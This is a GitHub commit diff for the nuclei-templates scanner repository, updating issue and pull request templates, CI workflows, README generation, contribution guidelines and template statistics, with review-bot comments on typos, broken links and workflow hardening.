Merge branch 'master' into master

patch-1
Sandeep Singh 2021-12-29 21:28:30 +05:30 committed by GitHub
commit a10aff06e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2367 changed files with 72699 additions and 7353 deletions

@ -1,32 +0,0 @@
---
name: Bug report
about: Create a issue to help us improve
title: "[Bug] "
labels: ''
assignees: ''
---
**Nuclei version**
```
nuclei -version
```
**Nuclei template version**
```
cat ~/.nuclei-config.json
```
**Describe the bug**
A clear and concise description of what the bug is.
**Commands to reproduce**
```
nuclei -t xxx -target xxx
```
**Screenshots**
If applicable, add screenshots to help explain your problem.

14
.github/ISSUE_TEMPLATE/config.yml vendored Normal file

@ -0,0 +1,14 @@
blank_issues_enabled: false
contact_links:
- name: Ask an question / advise on using nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
about: Ask a question or request support for using nuclei-templates
- name: Share idea / feature to discuss for nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
about: Share idea / feature to discuss for nuclei-templates
- name: Connect with PD Team & Community (Discord)
url: https://discord.gg/projectdiscovery
about: Connect with PD Team & Community for direct communication
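Review bot: The first contact link name reads `Ask an question / advise on using nuclei-templates`; this string is shown to every user on the new-issue chooser, so it should be `Ask a question / advice on using nuclei-templates`. The `about` line directly below it already has the correct wording.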

@ -0,0 +1,21 @@
---
name: False Negative
about: 'Issue for template missing valid/expected result.'
labels: 'false-negative'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Nuclei Version:
<!-- You can find current version of nuclei with "nuclei -version" -->
### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
### Command to reproduce:
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->

@ -1,30 +1,24 @@
---
name: False Positive
about: 'Create an issue if you found false positive results. '
title: "[false-positive] template-name "
about: 'Issue for template producing invalid/unexpected result.'
labels: 'false-positive'
assignees: ''
---
**Nuclei version**
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
```
nuclei -version
```
### Nuclei Version:
**Nuclei template version**
<!-- You can find current version of nuclei with "nuclei -version" -->
```
cat ~/.nuclei-config.json
```
### Template file:
**Template ID**
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
Please submit the ID template producing false-positive results.
### Command to reproduce:
**Commands to Reproduce**
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
```
nuclei -t template_id -target ?
```
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
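Review bot: `Screnshots` in the `### Anything else:` comment is a typo for `Screenshots`, and the same comment text is copied into issue-report.md. Separately, the reproduce comment asks users to DM host information on Discord; it would help to say outright that target hosts should not be pasted into the public issue, as the pull request template in this commit does for pull requests.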

@ -1,16 +1,18 @@
---
name: Feature request
about: Suggest an idea to improve nuclei templates
title: "[Feature] "
labels: ''
assignees: ''
about: Request feature to implement in this project
labels: 'Type: Enhancement'
---
**Is your feature request related to a problem? Please describe.**
<!--
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
-->
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
### Please describe your feature request:
<!-- A clear and concise description of feature to implement -->
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
### Describe the use case of this feature:
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->

21
.github/ISSUE_TEMPLATE/issue-report.md vendored Normal file

@ -0,0 +1,21 @@
---
name: Issue report
about: "Issue to report invalid template"
labels: 'Type: Bug'
---
<!--
1. Please search to see if an issue already exists for the bug you encountered.
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
-->
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Issue description:
<!-- A concise description of what you're experiencing. -->
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

@ -1,15 +1,23 @@
---
name: Submit Template
about: Submit nuclei template using issue
title: "[nuclei-template] template-name"
name: Template Contribution
about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
assignees: ''
---
**Template Details**
### Template Information:
<!-- Include basic information of the template including reference -->
<!-- Templates without any reference mostly likely to take more time for review/validation -->
### Nuclei Template:
<!-- Include nuclei template in between code block shared below -->
```yaml
nuclei template goes here
```
<!-- Include template results if available or redacted valid response snippet of valid match -->
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->

@ -3,7 +3,7 @@ f"""
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,25 +24,21 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} |
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
{get_top10()}
**{command("tree", -2, None)}**.
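Review bot: The new overview sentence promises that `The table below contains the top ten statistics`, but `{get_top10()}` renders as an empty string when TOP-10.md is missing or empty, which leaves the sentence pointing at nothing. Either have the helper emit that sentence together with the table, or fail the README build when the stats file is absent. Also, `for each matrix` probably means `for each metric`.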
@ -50,34 +46,39 @@ An overview of the nuclei template directory including number of templates assoc
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation.
Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei.
Thanks again for your contribution and keeping the community vibrant. :heart:
"""
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
Thanks again for your contribution and keeping this community vibrant. :heart:
"""

@ -8,6 +8,11 @@ def countTpl(path):
def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
TOP10 = command(["cat", "TOP-10.md"])
return HEADER + TOP10 if len(TOP10) > 0 else ""
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
template = eval(open(".github/scripts/README.tmpl", "r").read())
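Review bot: `get_top10()` shells out to `cat TOP-10.md` through `command()`, which captures stderr and never checks the return code, so a missing or unreadable file is indistinguishable from an empty one and the section is silently dropped. Reading the file with `open()` and handling `FileNotFoundError` would make that case explicit and remove a subprocess. `command()` also trims the final character of the output with `[:-1]`, which removes the last `|` of the table if TOP-10.md does not end in a newline. The context line `template = eval(open(...).read())` executes README.tmpl as Python in a job that later pushes to the repository, so changes to that template need the same review as changes to this script.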

46
.github/workflows/cve-annotate.yml vendored Normal file

@ -0,0 +1,46 @@
name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
workflow_dispatch:
jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.cve-annotate.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add cves
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes
if: steps.cve-annotate.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
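Review bot: Every external dependency in this job comes from a moving ref: `actions/checkout@master`, `ad-m/github-push-action@master`, and `go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev`. The job commits and pushes back to the triggering branch with `secrets.GITHUB_TOKEN`, so whatever those refs point to at run time gets write access to the repository; pin the actions to a commit SHA and the tool to a tagged release. Unlike readme-update.yml, there is no `if: github.repository == 'projectdiscovery/nuclei-templates'` guard here, so forks with Actions enabled will run this on every push to their `master`.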

47
.github/workflows/readme-update.yml vendored Normal file

@ -0,0 +1,47 @@
name: 📝 Readme Update
on:
workflow_run:
workflows: ["🗒 Templates Stats"]
types:
- completed
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out code
uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: "3.8"
- name: Update README
id: readme-update
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.readme-update.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto README Update [$(date)] :robot:" -a
- name: Push changes
if: steps.readme-update.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
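Review bot: The `workflow_run` trigger with `types: completed` fires when Templates Stats finishes with any conclusion, including failure or cancellation, so the README can be regenerated from stale or partial stats. Add the conclusion to the job condition alongside the existing repository check, for example `github.event_name == 'workflow_dispatch' || github.event.workflow_run.conclusion == 'success'`. `actions/checkout@master` and `ad-m/github-push-action@master` are mutable refs in a job that pushes with the token; pin them to commit SHAs.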

37
.github/workflows/template-validate.yml vendored Normal file

@ -0,0 +1,37 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
working-directory: /tmp
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -validate -t .
nuclei -validate -w ./workflows
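Review bot: `return release.data.name` uses the release's display name, which is free text, as the tag in the download URL and, through `${VERSION:1}`, as the version in the archive name; `release.data.tag_name` is the field that matches the URL path. The archive is then unpacked into `/usr/local/bin` with `sudo` and no integrity check, and `nuclei*.zip` is a glob in `/tmp`; download to a fixed filename and verify it against a published checksum before unzipping. `actions/checkout@master` should be pinned as well.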

52
.github/workflows/templates-stats.yml vendored Normal file

@ -0,0 +1,52 @@
name: 🗒 Templates Stats
on:
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Installing Template Stats
run: |
go install github.com/projectdiscovery/templates-stats@main
shell: bash
- name: Markdown Stats
run: |
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: JSON Stats
run: |
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Top 10 Stats
run: |
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.stats.outputs.changes > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
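Review bot: The `Push changes` step has no `if: steps.stats.outputs.changes > 0` condition, unlike `Commit files` just above it, so the push action runs even when nothing was committed. Add the same condition to it. The three `-path /home/runner/work/nuclei-templates/nuclei-templates/` arguments hard-code the runner checkout location; `${{ github.workspace }}` gives the same directory without depending on the repository name. `go install github.com/projectdiscovery/templates-stats@main` and the `@master` action refs should be pinned too, since this job pushes with `secrets.GITHUB_TOKEN`.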

@ -1,48 +0,0 @@
name: 📝 Readme Update
on:
push:
branches:
- master
create:
tags:
- v*
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out code
uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: "3.8"
- name: Update README
id: update-readme
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.update-readme.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Update README [$(date)] :robot:" -a
- name: Push changes
if: steps.update-readme.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

3
.gitignore vendored

@ -1,2 +1,5 @@
.idea/
.DS_Store
local/
.checksum
.new-additions

@ -8,10 +8,9 @@
# unless asked for by the user.
tags:
- "fuzz"
- "dos"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.
# unless asked for by the user.

@ -2,7 +2,7 @@
extends: default
ignore: |
.pre-commit-config.yaml
.pre-commit-config.yml
.github/workflows/*.yml
rules:

100
CONTRIBUTING.md Normal file

@ -0,0 +1,100 @@
# Template Contribution Guidelines
This documentation contains a set of guidelines to help you during the contribution process.
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
Thank you for helping out and remember, **no contribution is too small.**
# Submitting Nuclei Templates 👩‍💻👨‍💻
Below you will find the process and workflow used to review and merge your changes.
## Step 1 : Find existing templates
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
## Step 2 : Fork the Project
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
```sh
git clone https://github.com/<your-username>/nuclei-templates
cd nuclei-templates
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
```
- If you have already forked the project, update your copy before working.
```sh
git remote update
git checkout master
git rebase upstream/master
```
## Step 3 : Create your Template Branch
Create a new branch. Use its name to identify the issue your addressing.
```sh
# It will create a new branch with name template_branch_name and switch to that branch
git checkout -b template_branch_name
```
## Step 4 : Create Template and Commit
- Create your template.
- Add all the files/folders needed.
- After you've made changes or completed template creation, add changes to the branch you've just created by:
```sh
# To add all new files to branch template_branch_name
git add .
```
- To commit, give a descriptive message for the convenience of the reviewer by:
```sh
# This message get associated with all files you have changed
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.
## Step 5 : Push Your Changes
- Now you are ready to push your template to the remote (forked) repository.
- When your work is ready and complies with the project conventions, upload your changes to your fork:
```sh
# To push your work to your remote repository
git push -u origin template_branch_name
```
## Step 6 : Pull Request
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
## Need more help?🤔
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
## Tip from us😇
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere
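Review bot: Step 4 tells contributors to stage with `git add .`, which picks up every untracked file in the working tree, including scan output or notes that may contain target hosts; since the note right below asks for one template per pull request, show `git add path/to/template.yaml` instead. In Step 3, `the issue your addressing` should be `you're addressing`. In the help list, the `Cloning a Repo` link points at a URL ending in `creating-an-issue-or-pull-request`, which does not look like a cloning guide.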

28
PULL_REQUEST_TEMPLATE.md Normal file

@ -0,0 +1,28 @@
### Template / PR Information
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:
### Template Validation
I've validated this template locally?
- [ ] YES
- [ ] NO
#### Additional Details (leave it blank if not applicable)
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
### Additional References:
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
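Review bot: The `Nuclei Template Contribution Guideline` link points to `blob/master/.github/CONTRIBUTING.md`, but the file header in this commit lists the new guide as `CONTRIBUTING.md` without the `.github/` prefix. Check which location is intended and make the link match, otherwise every pull request description will carry a broken link. The checklist heading `I've validated this template locally?` mixes a statement with a question mark; `Have you validated this template locally?` reads more cleanly.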

@ -3,7 +3,7 @@
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,59 +24,73 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 357 | vulnerabilities | 199 | exposed-panels | 154 |
| takeovers | 68 | exposures | 107 | technologies | 107 |
| misconfiguration | 71 | workflows | 32 | miscellaneous | 25 |
| default-logins | 31 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
## Nuclei Templates Top 10 statistics
**119 directories, 1343 files**.
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
**195 directories, 2764 files**.
</td>
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation.
Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei.
Thanks again for your contribution and keeping the community vibrant. :heart:
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
Thanks again for your contribution and keeping this community vibrant. :heart:
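Review bot: The Contributions paragraph still links to `template=submit-template.md`, `template=feature_request.md` and `template=bug_report.md`. This commit deletes the `Bug report` issue template, adds `issue-report.md`, and sets `blank_issues_enabled: false` in config.yml, so the bug report link needs to point at the new template name. README.md is generated, so make the change in `.github/scripts/README.tmpl`, which carries the same links.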

1
TEMPLATES-STATS.json Normal file

File diff suppressed because one or more lines are too long

1145
TEMPLATES-STATS.md Normal file

File diff suppressed because it is too large Load Diff

12
TOP-10.md Normal file

@ -0,0 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |

27
cnvd/CNVD-2019-06255.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
